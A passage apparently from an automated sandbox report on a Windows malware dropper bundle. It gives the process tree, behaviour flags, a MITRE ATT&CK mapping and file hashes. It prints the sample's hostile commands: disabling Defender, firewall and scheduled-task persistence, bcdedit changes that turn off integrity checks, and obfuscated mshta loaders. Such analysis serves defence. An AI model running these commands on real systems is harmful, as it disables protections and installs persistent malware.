PID 1984 wrote to memory of 2752	1984	setup_install.exe	cmd.exe
PID 1984 wrote to memory of 2752	1984	setup_install.exe	cmd.exe
PID 1984 wrote to memory of 2752	1984	setup_install.exe	cmd.exe
PID 1984 wrote to memory of 2752	1984	setup_install.exe	cmd.exe
PID 1984 wrote to memory of 2752	1984	setup_install.exe	cmd.exe
PID 1984 wrote to memory of 2752	1984	setup_install.exe	cmd.exe
PID 1984 wrote to memory of 2752	1984	setup_install.exe	cmd.exe
PID 2752 wrote to memory of 2788	2752	cmd.exe	powershell.exe
PID 2752 wrote to memory of 2788	2752	cmd.exe	powershell.exe
PID 2752 wrote to memory of 2788	2752	cmd.exe	powershell.exe
PID 2752 wrote to memory of 2788	2752	cmd.exe	powershell.exe
PID 2752 wrote to memory of 2788	2752	cmd.exe	powershell.exe
PID 2752 wrote to memory of 2788	2752	cmd.exe	powershell.exe
PID 2752 wrote to memory of 2788	2752	cmd.exe	powershell.exe
PID 2748 wrote to memory of 2780	2748	cmd.exe	powershell.exe
PID 2748 wrote to memory of 2780	2748	cmd.exe	powershell.exe
PID 2748 wrote to memory of 2780	2748	cmd.exe	powershell.exe
PID 2748 wrote to memory of 2780	2748	cmd.exe	powershell.exe
PID 2748 wrote to memory of 2780	2748	cmd.exe	powershell.exe
PID 2748 wrote to memory of 2780	2748	cmd.exe	powershell.exe
PID 2748 wrote to memory of 2780	2748	cmd.exe	powershell.exe
PID 1984 wrote to memory of 2724	1984	setup_install.exe	cmd.exe
PID 1984 wrote to memory of 2724	1984	setup_install.exe	cmd.exe
PID 1984 wrote to memory of 2724	1984	setup_install.exe	cmd.exe
PID 1984 wrote to memory of 2724	1984	setup_install.exe	cmd.exe
PID 1984 wrote to memory of 2724	1984	setup_install.exe	cmd.exe
PID 1984 wrote to memory of 2724	1984	setup_install.exe	cmd.exe
PID 1984 wrote to memory of 2724	1984	setup_install.exe	cmd.exe
PID 1984 wrote to memory of 2884	1984	setup_install.exe	cmd.exe
PID 1984 wrote to memory of 2884	1984	setup_install.exe	cmd.exe
PID 1984 wrote to memory of 2884	1984	setup_install.exe	cmd.exe
PID 1984 wrote to memory of 2884	1984	setup_install.exe	cmd.exe
PID 1984 wrote to memory of 2884	1984	setup_install.exe	cmd.exe
PID 1984 wrote to memory of 2884	1984	setup_install.exe	cmd.exe
PID 1984 wrote to memory of 2884	1984	setup_install.exe	cmd.exe
PID 1984 wrote to memory of 2528	1984	setup_install.exe	cmd.exe
PID 1984 wrote to memory of 2528	1984	setup_install.exe	cmd.exe
PID 1984 wrote to memory of 2528	1984	setup_install.exe	cmd.exe
PID 1984 wrote to memory of 2528	1984	setup_install.exe	cmd.exe
PID 1984 wrote to memory of 2528	1984	setup_install.exe	cmd.exe
PID 1984 wrote to memory of 2528	1984	setup_install.exe	cmd.exe
PID 1984 wrote to memory of 2528	1984	setup_install.exe	cmd.exe
PID 1984 wrote to memory of 2684	1984	setup_install.exe	cmd.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2400

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1768

C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\setup_install.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1984

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
4⤵
- Suspicious use of WriteProcessMemory
PID:2748

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2780

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
4⤵
- Suspicious use of WriteProcessMemory
PID:2752

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2788

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu0234487e961.exe
4⤵
- Loads dropped DLL
PID:2724

C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\Thu0234487e961.exe
Thu0234487e961.exe
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2824

C:\Users\Admin\AppData\Local\Temp\is-RJRN2.tmp\Thu0234487e961.tmp
"C:\Users\Admin\AppData\Local\Temp\is-RJRN2.tmp\Thu0234487e961.tmp" /SL5="$201B4,140047,56320,C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\Thu0234487e961.exe"
6⤵
- Executes dropped EXE
PID:468

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu020afc6240.exe
4⤵
PID:2884

C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\Thu020afc6240.exe
Thu020afc6240.exe
5⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:2076

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
6⤵
PID:2428

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2508

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu024ca9649258.exe
4⤵
- Loads dropped DLL
PID:2528

C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\Thu024ca9649258.exe
Thu024ca9649258.exe
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:976

C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\Thu024ca9649258.exe
"C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\Thu024ca9649258.exe"
6⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2836

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
7⤵
PID:2316

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
8⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
PID:2976

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /306-306
7⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Manipulates WinMon driver.
- Manipulates WinMonFS driver.
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:2120

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
8⤵
- Creates scheduled task(s)
PID:536

C:\Windows\system32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
8⤵
PID:2744

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
8⤵
- Executes dropped EXE
- Modifies system certificate store
PID:1572

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
9⤵
- Modifies boot configuration data using bcdedit
PID:2920

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
9⤵
- Modifies boot configuration data using bcdedit
PID:2980

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
9⤵
- Modifies boot configuration data using bcdedit
PID:872

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
9⤵
- Modifies boot configuration data using bcdedit
PID:300

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
9⤵
- Modifies boot configuration data using bcdedit
PID:2600

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
9⤵
- Modifies boot configuration data using bcdedit
PID:432

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
9⤵
- Modifies boot configuration data using bcdedit
PID:2964

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
9⤵
- Modifies boot configuration data using bcdedit
PID:1264

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
9⤵
- Modifies boot configuration data using bcdedit
PID:1556

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
9⤵
- Modifies boot configuration data using bcdedit
PID:2956

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
9⤵
- Modifies boot configuration data using bcdedit
PID:2716

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
9⤵
- Modifies boot configuration data using bcdedit
PID:2712

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
9⤵
- Modifies boot configuration data using bcdedit
PID:2076

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
8⤵
- Executes dropped EXE
PID:2576

C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
8⤵
- Modifies boot configuration data using bcdedit
PID:1564

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
8⤵
- Executes dropped EXE
PID:2344

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu02654d5746e2d67.exe
4⤵
- Loads dropped DLL
PID:2696

C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\Thu02654d5746e2d67.exe
Thu02654d5746e2d67.exe
5⤵
- Executes dropped EXE
PID:1708

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu027a65efa25b.exe
4⤵
- Loads dropped DLL
PID:2516

C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\Thu027a65efa25b.exe
Thu027a65efa25b.exe
5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
PID:1032

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu02aea30bc802ab68.exe
4⤵
- Loads dropped DLL
PID:2700

C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\Thu02aea30bc802ab68.exe
Thu02aea30bc802ab68.exe
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:1940

C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\Thu02aea30bc802ab68.exe
C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\Thu02aea30bc802ab68.exe
6⤵
- Executes dropped EXE
PID:2016

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu02f01df988c7.exe
4⤵
- Loads dropped DLL
PID:2568

C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\Thu02f01df988c7.exe
Thu02f01df988c7.exe
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:904

C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\Thu02f01df988c7.exe
C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\Thu02f01df988c7.exe
6⤵
- Executes dropped EXE
PID:628

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu029178728a4f78d0a.exe
4⤵
- Loads dropped DLL
PID:2020

C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\Thu029178728a4f78d0a.exe
Thu029178728a4f78d0a.exe
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:584

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu02d225322d4ec1.exe
4⤵
- Loads dropped DLL
PID:2680

C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\Thu02d225322d4ec1.exe
Thu02d225322d4ec1.exe
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:1720

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\Thu02d225322d4ec1.exe"
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2420

C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\Thu02d225322d4ec1.exe
"C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\Thu02d225322d4ec1.exe"
6⤵
- Executes dropped EXE
PID:2188

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu02e68baa8dd93d.exe
4⤵
- Loads dropped DLL
PID:2684

C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\Thu02e68baa8dd93d.exe
Thu02e68baa8dd93d.exe
5⤵
- Executes dropped EXE
PID:2868

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu0251b4c93ad7bbff.exe
4⤵
- Loads dropped DLL
PID:2548

C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\Thu0251b4c93ad7bbff.exe
Thu0251b4c93ad7bbff.exe
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1216

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu0254f37076fcd55fb.exe
4⤵
- Loads dropped DLL
PID:2628

C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\Thu0254f37076fcd55fb.exe
Thu0254f37076fcd55fb.exe
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:1544

C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\Thu0254f37076fcd55fb.exe
C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\Thu0254f37076fcd55fb.exe
6⤵
- Executes dropped EXE
PID:748

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c echo Y|CACLS "C:\Users\Admin\AppData\Local\Temp\6829558ede\tkools.exe" /P "Admin:N"
7⤵
PID:1816

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
8⤵
PID:968

C:\Windows\SysWOW64\cacls.exe
CACLS "C:\Users\Admin\AppData\Local\Temp\6829558ede\tkools.exe" /P "Admin:N"
8⤵
PID:2268

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c CACLS "C:\Users\Admin\AppData\Local\Temp\6829558ede\tkools.exe" /P "Admin:R" /E
7⤵
PID:276

C:\Windows\SysWOW64\cacls.exe
CACLS "C:\Users\Admin\AppData\Local\Temp\6829558ede\tkools.exe" /P "Admin:R" /E
8⤵
PID:2172

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c echo Y|CACLS "C:\Users\Admin\AppData\Local\Temp\6829558ede" /P "Admin:N"
7⤵
PID:2744

C:\Windows\SysWOW64\cacls.exe
CACLS "C:\Users\Admin\AppData\Local\Temp\6829558ede" /P "Admin:N"
8⤵
PID:536

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
8⤵
PID:2888

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c CACLS "C:\Users\Admin\AppData\Local\Temp\6829558ede" /P "Admin:R" /E
7⤵
PID:600

C:\Windows\SysWOW64\cacls.exe
CACLS "C:\Users\Admin\AppData\Local\Temp\6829558ede" /P "Admin:R" /E
8⤵
PID:2300

C:\Users\Admin\AppData\Local\Temp\6829558ede\tkools.exe
"C:\Users\Admin\AppData\Local\Temp\6829558ede\tkools.exe"
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2756

C:\Users\Admin\AppData\Local\Temp\6829558ede\tkools.exe
C:\Users\Admin\AppData\Local\Temp\6829558ede\tkools.exe
8⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1216

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN tkools.exe /TR "C:\Users\Admin\AppData\Local\Temp\6829558ede\tkools.exe" /F
9⤵
- Creates scheduled task(s)
PID:2356

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\6829558ede\
9⤵
PID:1548

C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\6829558ede\
10⤵
PID:2996

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu02bbe7aaca36e.exe
4⤵
- Loads dropped DLL
PID:536

C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\Thu02bbe7aaca36e.exe
Thu02bbe7aaca36e.exe
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2888

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu02da05dae0713eb.exe
4⤵
- Loads dropped DLL
PID:2484

C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\Thu02da05dae0713eb.exe
Thu02da05dae0713eb.exe
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2800

C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\Thu02da05dae0713eb.exe
"C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\Thu02da05dae0713eb.exe" -u
6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:280

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu023dd5e6f6cce12f9.exe /mixtwo
4⤵
PID:3024

C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\Thu023dd5e6f6cce12f9.exe
Thu023dd5e6f6cce12f9.exe /mixtwo
5⤵
- Executes dropped EXE
PID:2080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 264
6⤵
- Program crash
PID:520

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu02acb863a216.exe
4⤵
- Loads dropped DLL
PID:2404

C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\Thu02acb863a216.exe
Thu02acb863a216.exe
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:900

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu024bc696ba.exe
4⤵
PID:2992

C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\Thu024bc696ba.exe
Thu024bc696ba.exe
5⤵
- Executes dropped EXE
PID:920

C:\Users\Admin\AppData\Local\Temp\is-VS3OA.tmp\Thu024bc696ba.tmp
"C:\Users\Admin\AppData\Local\Temp\is-VS3OA.tmp\Thu024bc696ba.tmp" /SL5="$601A4,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\Thu024bc696ba.exe"
6⤵
- Executes dropped EXE
PID:2760

C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\Thu024bc696ba.exe
"C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\Thu024bc696ba.exe" /SILENT
7⤵
- Executes dropped EXE
PID:972

C:\Users\Admin\AppData\Local\Temp\is-JJ4DE.tmp\Thu024bc696ba.tmp
"C:\Users\Admin\AppData\Local\Temp\is-JJ4DE.tmp\Thu024bc696ba.tmp" /SL5="$4018E,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\Thu024bc696ba.exe" /SILENT
8⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:1616

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu0247db132a8b.exe
4⤵
- Loads dropped DLL
PID:932

C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\Thu0247db132a8b.exe
Thu0247db132a8b.exe
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
PID:1884

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBsCRIpt: ClOsE( crEateOBjeCT ("WscRipT.ShElL" ). ruN ( "CMd /q /R cOPY /y ""C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\Thu02bbe7aaca36e.exe"" ..\HuYMRJYt.eXE && sTArT ..\HUYMRJyT.eXe /pH7FDL9cM6JL7 &IF """" == """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\Thu02bbe7aaca36e.exe"" ) do taskkill /f -iM ""%~NXK"" " , 0 , tRUe))
1⤵
PID:2084

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /R cOPY /y "C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\Thu02bbe7aaca36e.exe" ..\HuYMRJYt.eXE&& sTArT ..\HUYMRJyT.eXe /pH7FDL9cM6JL7&IF "" =="" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\Thu02bbe7aaca36e.exe" ) do taskkill /f -iM "%~NXK"
2⤵
PID:2968

C:\Windows\SysWOW64\taskkill.exe
taskkill /f -iM "Thu02bbe7aaca36e.exe"
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2916

C:\Users\Admin\AppData\Local\Temp\HuYMRJYt.eXE
..\HUYMRJyT.eXe /pH7FDL9cM6JL7
3⤵
- Executes dropped EXE
PID:2804

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBsCRIpt: ClOsE( crEateOBjeCT ("WscRipT.ShElL" ). ruN ( "CMd /q /R cOPY /y ""C:\Users\Admin\AppData\Local\Temp\HuYMRJYt.eXE"" ..\HuYMRJYt.eXE && sTArT ..\HUYMRJyT.eXe /pH7FDL9cM6JL7 &IF ""/pH7FDL9cM6JL7"" == """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\HuYMRJYt.eXE"" ) do taskkill /f -iM ""%~NXK"" " , 0 , tRUe))
4⤵
- Modifies Internet Explorer settings
PID:2272

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /R cOPY /y "C:\Users\Admin\AppData\Local\Temp\HuYMRJYt.eXE" ..\HuYMRJYt.eXE&& sTArT ..\HUYMRJyT.eXe /pH7FDL9cM6JL7&IF "/pH7FDL9cM6JL7" =="" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\HuYMRJYt.eXE" ) do taskkill /f -iM "%~NXK"
5⤵
PID:556

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbSCRiPt:close (crEATeOBject( "WsCrIpt.SHeLl" ). rUN ( "CMD.exe /q /r eChO S0gNC:\Users\Admin\AppData\Local\TempW23wd> Uoi5KC.F & eChO | set /p = ""MZ"" > RI3R.h& COPY /b /Y RI3r.h + TDbHoF6.Nei+ wN0W5.1x + AXWt.P2o +PH3tc.1_ + wGtRI.AM +UOi5kC.F ..\CZ_EN.~Fx & dEl /q *& staRT odbcconf.exe -a { rEgsvr ..\CZ_EN.~FX } " , 0 ,TruE ) )
4⤵
PID:2236

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /r eChO S0gNC:\Users\Admin\AppData\Local\TempW23wd> Uoi5KC.F &eChO | set /p = "MZ" >RI3R.h& COPY /b /Y RI3r.h+TDbHoF6.Nei+ wN0W5.1x +AXWt.P2o +PH3tc.1_ +wGtRI.AM+UOi5kC.F ..\CZ_EN.~Fx &dEl /q *& staRT odbcconf.exe -a { rEgsvr ..\CZ_EN.~FX }
5⤵
PID:2504

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eChO "
6⤵
PID:2460

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" set /p = "MZ" 1>RI3R.h"
6⤵
PID:1768

C:\Windows\SysWOW64\odbcconf.exe
odbcconf.exe -a { rEgsvr ..\CZ_EN.~FX }
6⤵
PID:1700

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20230710130526.log C:\Windows\Logs\CBS\CbsPersist_20230710130526.cab
1⤵
- Drops file in Windows directory
PID:3040

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "206328033-247217854-715662192352896933-837914078-3543943161283439272-527557962"
1⤵
PID:968

C:\Windows\system32\taskeng.exe
taskeng.exe {4DCBD184-E853-4F84-A940-E28F243E9877} S-1-5-21-264077997-199365141-898621884-1000:KOSNGVQI\Admin:Interactive:[1]
1⤵
PID:1468

C:\Users\Admin\AppData\Local\Temp\6829558ede\tkools.exe
C:\Users\Admin\AppData\Local\Temp\6829558ede\tkools.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1612

C:\Users\Admin\AppData\Local\Temp\6829558ede\tkools.exe
C:\Users\Admin\AppData\Local\Temp\6829558ede\tkools.exe
3⤵
- Executes dropped EXE
PID:1704

C:\Users\Admin\AppData\Local\Temp\6829558ede\tkools.exe
C:\Users\Admin\AppData\Local\Temp\6829558ede\tkools.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1196

C:\Users\Admin\AppData\Local\Temp\6829558ede\tkools.exe
C:\Users\Admin\AppData\Local\Temp\6829558ede\tkools.exe
3⤵
- Executes dropped EXE
PID:3048

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Disabling Security Tools

T1089

Impair Defenses

T1562

Install Root Certificate

T1130

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\6829558ede\tkools.exe

Filesize
1.1MB

MD5
644c87d6d9800d82dd0c3deef8798fe1

SHA1
123e87f39d6bc8f1332ef8c6da17b86045775b5f

SHA256
9c2b3a7c5abdcd9cfbafc27cddcdd4054cea214e15d3a1666cf407d2479a1f7e

SHA512
79fb19716b1afd3c368b62d45954f0aed59f2d570fc7a7f0030995e6920ccec00e1296aeb72b536087bcd76e9ec93469fce5c2391d68c93bf99c4756aa5ac0cc

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\Thu020afc6240.exe

Filesize
1.4MB

MD5
c2fc727cbd15a486f072dd39b297f6e5

SHA1
84f725c6936ad7c945f1eda399ed690ef7c91b9f

SHA256
6686bb43f616def6b1c505186fc545828fa31d912e6f0ffe128134e7c01bb3d2

SHA512
ee72dc852933218fd351aafc3418f11a4648fed21369bd6ebfcc05e1ca202869d9454eb916ed128db78d63d4ab7d090bf86c7cd88a90c6ad222479af798c9dfb

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS8E69216D\Thu0234487e961.exe
